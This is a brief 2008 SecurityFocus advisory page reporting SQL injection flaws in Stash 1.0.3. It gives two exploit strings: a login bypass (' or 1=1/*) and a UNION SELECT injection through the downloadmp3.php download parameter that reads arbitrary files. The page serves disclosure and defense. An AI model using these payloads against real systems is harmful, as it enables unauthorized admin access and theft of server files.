Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Stash 1.0.3 Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following examples and exploit code are available:

http://www.example.com/[path]/admin/login
Username : ' or 1=1/*
Password : R3d.W0rm

http://www.example.com/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file name in hex])/*







 

Privacy Statement
Copyright 2008, SecurityFocus